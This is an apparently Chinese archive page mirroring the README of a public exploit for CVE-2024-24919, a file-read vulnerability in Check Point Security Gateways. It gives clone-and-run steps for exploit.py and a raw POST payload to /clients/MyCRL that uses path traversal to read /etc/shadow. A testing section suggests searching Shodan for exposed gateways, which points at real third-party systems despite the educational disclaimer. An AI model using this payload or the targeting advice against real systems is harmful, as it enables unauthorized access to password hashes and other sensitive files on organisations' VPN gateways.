POC详情: 5c5d70426f6b88f9a9e634704c9b605d4720010a

来源
https://github.com/Rug4lo/CVE-2024-24919-Exploit
关联漏洞
标题: Check Point Security Gateways 安全漏洞 (CVE-2024-24919)
描述:Check Point Security Gateways是以色列Check Point公司的一个人工智能驱动的 NGFW 安全网关。 Check Point Security Gateways 存在安全漏洞。攻击者利用该漏洞可以获取敏感信息。
描述
 CVE-2024-24919 Exploit and PoC - Critical LFI for Remote Access VPN or Mobile Access.
介绍
# CVE-2024-24919-Exploit

## Overview

This repository contains a python exploit for the CVE-2024-24919, a vulnerability that allows you to read sensitive files from the vulnerable page.

This exploit first checks if the target is vulnerable, and then gets the path you specify.

**Severity**: Critical

## Usage

First clone the repository:

    git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
    cd CVE-2024-24919-Exploit

Give privileges and execute the exploit with python3

    chmod +x exploit.py
    python3 exploit.py

Then follow the steps and you will get the data of the file you specify


If you are strugling make sure the URL you specify is the main one

✓ `https://google.com`

✘ `https://google.com/search?client=firefox`

## POC (Proof Of Concept)

First we need to make sure that the website have Check Point Security Gateways which have remote access VPN or mobile access software enabled.

In this exploit we are pointing to the `{ip}/clients/MyCRL` endpoint.

This endpoint is vulnerable if we do a POST petition, we add the string `CSHELL/` and the path of the file we want to read using a Path Traversal.

The request will be something like this:

    POST /clients/MyCRL HTTP/1.1
    Host: <redacted>
    Content-Length: 39

    aCSHELL/../../../../../../../etc/shadow

We get all of this looking the source code

For more information about the process check this post --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/

## Test

If you want to test this vulnerability you can use Sodan to find some vulnerable websites, using this query in sodan

    Server: “Check Point SVN Foundation”

## References
https://nvd.nist.gov/vuln/detail/CVE-2024-24919
https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/
https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919

## Disclaimer
This script is for educational purposes only. Use it responsibly and only on systems you have permission to access.
文件快照

 [4.0K]  /data/pocs/5c5d70426f6b88f9a9e634704c9b605d4720010a
├── [3.1K]  exploit.py
└── [2.0K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。